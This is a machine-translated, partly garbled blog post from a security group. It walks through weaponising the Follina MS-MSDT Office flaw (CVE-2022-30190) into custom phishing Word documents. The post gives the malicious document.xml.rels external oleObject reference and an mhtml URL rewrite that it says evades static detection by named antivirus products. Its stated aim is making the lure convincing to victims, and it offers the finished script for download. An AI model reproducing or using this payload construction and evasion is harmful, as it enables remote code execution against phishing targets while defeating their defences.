Technical communication

  Pay attention to WeChat public number  Z20 Security team  , reply   Add group  , Pull you into the group Discuss technology together .

The official account is copied. , The layout may be a bit messy , You can go to the official account .

I took a look at it two days ago 'Follina' MS-MSDT n-day Microsoft Office RCE This loophole , Revised it chvancooten Script for , The implementation can be customized word Templates , It is convenient for fishing in practice , Edit fishing by yourself word After the documents -f Parameters can be specified .

1、 Reappear

Use https://github.com/chvancooten/follina.py The project generated malicious word file , Command execution can be realized , But Tencent computer housekeeper 、 Tinder will kill .

2、 analysis poc

There are mainly two places , One is to change word Of word/_rels Add a new... Under the directory document.xml.rels file , Inside is a windows.location.href Load remote connections

long-range html In the middle ms-msdt:/ The agreement says HTML

Finally, the file is compressed and packaged into docx.

3、Fuzz

The first one is

After analysis, we can see that it is only in word Of word/_rels Revised document.xml.rels file

No way to deal with empty documents in actual combat , Just create a new file and add something , Then unzip the file and it will document.xml.rels Put in , Compress it back , Discovery does not trigger .

The second kind

Generated clickme.docx Without modification , Can trigger multiple times , But as long as you modify it, you can't trigger it

The third kind of

modify document.xml.rels File name is not OK , Still killing

A fourth fuzz Content

It is the request outside the chain that is checked and killed ,http The words will be checked

mhtml:http://localhost:80/exploit.html!x-usc:http://localhost:80/exploit.html Switch to http://localhost:80/exploit.html!

That's all right.

But we should use our own word Templates , Otherwise, the victim will notice that something is wrong when he opens the door , So in order to be close to the actual combat , Modified the script , You can customize word Templates .

4、 reanalysis

4.1、word The structure and poc analysis

word File structure ：

.├── [Content_Types].xml   //  It describes the content of the whole document . Put each XML The files are combined into a whole ├── _rels                 //  Definition Package(Zip package ) And what it directly contains Part The relationship between . For one  Part  Come on , If it depends on others  Part, Then you need to work for this  Part  Create a directory , And there is also a  _rels  Catalog , There will be a  partname.rels  file . such as  /word/document.xml  It's a typical example ├── docProps              //  Record docx The main attribute information of the document │   ├── app.xml          //  Describes the document type of the document 、 edition 、 Read only information 、 share 、 Security attributes and other information │   └── core.xml         //  Describe when the document was created 、 title 、 The subject and author are based on Open XML General file attribute information of agreed document format └── word    ├── _rels    │   └── document.xml.rels    ├── charts    │   ├── _rels    │   │   ├── chart1.xml.rels  \\  The location of the text box file in the mapping table     │   ├── chart1.xml    │   ├── colors1.xml    │   ├── colors2.xml    │   ├── style1.xml    │   ├── style2.xml    ├── document.xml    //  The contents and properties of all visible text and the contents and properties of invisible parts in the document     ├── embeddings    │   ├── Microsoft_Excel_Worksheet.xlsx    │   ├── Microsoft_Excel_Worksheet1.xlsx    │   ├── oleObject1.bin  // OLE yes Object Linking and Embedding Abbreviation , Object connection and embedding ; Meet the needs of users to add data in different formats in a document （ Text 、 Images 、 Voice etc. ）, That is to solve the problem of creating composite documents .    │   ├── oleObject2.bin    │   ├── oleObject3.bin    │   ├── oleObject4.bin    ├── endnotes.xml     ├── fontTable.xml    //  Font information used in the document     ├── footer1.xml    ├── footer2.xml    ├── footnotes.xml    //  Footnote information in the document     ├── header1.xml    ├── header2.xml    ├── media               // Word Multimedia files in , Such as the inserted picture 、 The formula corresponds to wmf Documents, etc.     │   ├── image1.emf    │   ├── image2.png    │   ├── image3.jpeg    │   ├── image4.wmf    │   ├── image5.emf    ├── numbering.xml          // Word Ordered list in 、 Unordered list, etc , Defines the style of the list 、 Serial number and other information     ├── settings.xml           //  General setting information of the document     ├── styles.xml             // Word The style information of , Define the display priority and paragraph of the style 、 Table and other styles     ├── theme                  //  All information about the subject of the document , Such as color 、 font size     │   ├── theme1.xml    │   ├── themeOverride1.xml    │   └── themeOverride2.xml    └── webSettings.xml        //  Style information such as left and right spacing of the document 

analysis word Directory structure of , come to know Word/document.xml Is the inside of the file

[Content_Types].xml What's stored is part Name and type

every last part It's a xml,part If you reference an external file, you need to create one in the current directory _rels Folder , The following places the external references rels file ,poc It's used in document.xml External references to .

Poc The template of the script uses rid yes 1337, Control modification in documen.xml in , The following modification is changed to 1111

then document.xml.rels  After the corresponding modification, you can use

4.2、 About the contents of the document

By understanding word After the structure of , If you want the file content to be customized , That is, create a template , You can modify document.xml that will do

Fill in the following sections

And then the corresponding xxx.xml.rels Add a line of external references to the file , Be careful rid Corresponding .

<Relationship Id="rId1111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://localhost:80/exploit!" TargetMode="External"/>

The following custom templates , And trigger the vulnerability

4.3、 Static kill free

Online test

At last, I write a custom word The script for the template ：

Official account back office reply “CVE-2022-30190”, You can get the download link .

Technical communication

Communication group

Pay attention to the reply of the official account “ Add group ”, add to Z2OBot Small K Automatically pull you to join Z2O Security attack and defense communication group Share more good things .